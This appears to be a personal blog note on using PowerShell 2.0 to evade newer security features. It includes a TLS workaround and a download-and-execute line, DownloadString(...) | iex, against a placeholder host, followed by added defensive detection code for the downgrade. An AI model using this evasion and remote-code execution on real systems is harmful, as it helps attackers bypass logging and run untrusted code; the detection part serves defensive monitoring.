PowerShell 2 Notes

Published on 2023-03-19 by kzoltan with tags blog

As is widely known, PowerShell 2.0 does not include the security features that were introduced in later versions. Because of this, it can be a great way to avoid certain protection mechanisms.

The other day I was trying to execute something in-memory in PS2, and ran into issues. This post is just a note for myself.

By default PowerShell 2.0 can be executed with the binary:

c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

With the command:

powershell.exe -version 2

The first problem was that the folder contains a 'powershell.exe.config' file, which is written for later PS versions (and PS2 is not supported anymore). To solve this issue, just copy powershell.exe to another directory and execute it from there.

However, PS2 does not use TLS1.2 by default, so many downloads will fail with the following message:

DownloadString : Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: An unexpected error occurred on a send."

The solution is to set the protocol (after starting PS2 as described above) to a numeric value by casting, because the value is unknown to the PS2 enum:

$p = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);
[System.Net.ServicePointManager]::SecurityProtocol = $p;

After this, downloads can be started the usual way:

(new-object system.net.webclient).DownloadString('https://example.com/file.ps1') | iex
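From the defender's side, the two steps above (requesting engine version 2 and running a copy of powershell.exe from a non-default directory) are both visible in process-creation telemetry. The following is an added example, not code from the original post; the function name Find-PS2Downgrade and the sample records are constructed for illustration, and it assumes an analysis host with PowerShell 3.0 or later:

```powershell
# Constructed sample process-creation records (Image + CommandLine), not real telemetry.
$events = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -NoProfile -File C:\Scripts\backup.ps1' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -version 2' }
    [pscustomobject]@{ Image = 'C:\Users\Public\powershell.exe'
                       CommandLine = 'powershell.exe -v 2.0 -NoProfile' }
)

function Find-PS2Downgrade {
    # Hypothetical helper: flags records that match the downgrade pattern described in the post.
    param([Parameter(Mandatory)][object[]]$ProcessEvent)

    # powershell.exe accepts abbreviated parameter names, so match every prefix of -Version
    # followed by 2 or 2.0 (-match is case-insensitive by default).
    $versionArg = '(^|\s)-(version|versio|versi|vers|ver|ve|v)\s+2(\.0)?(\s|$)'
    # Default install locations of the binary (64-bit and 32-bit).
    $stockPath  = '^[A-Z]:\\Windows\\(System32|SysWOW64)\\WindowsPowerShell\\v1\.0\\powershell\.exe$'

    foreach ($e in $ProcessEvent) {
        $reasons = @()
        if ($e.CommandLine -match $versionArg) {
            $reasons += 'engine version 2 requested'
        }
        if ($e.Image -match '\\powershell\.exe$' -and $e.Image -notmatch $stockPath) {
            $reasons += 'powershell.exe started from a non-default directory'
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Image       = $e.Image
                CommandLine = $e.CommandLine
                Reason      = $reasons -join '; '
            }
        }
    }
}

# Flags the second and third sample records; the first (a normal scripted run) is not reported.
Find-PS2Downgrade -ProcessEvent $events | Format-List
```

The path check only catches a copy that keeps its file name, so in real telemetry the binary's original file name is the better field to match on. The Windows PowerShell event log also records engine starts as event ID 400 with an EngineVersion field, which gives a second signal that does not depend on the command line.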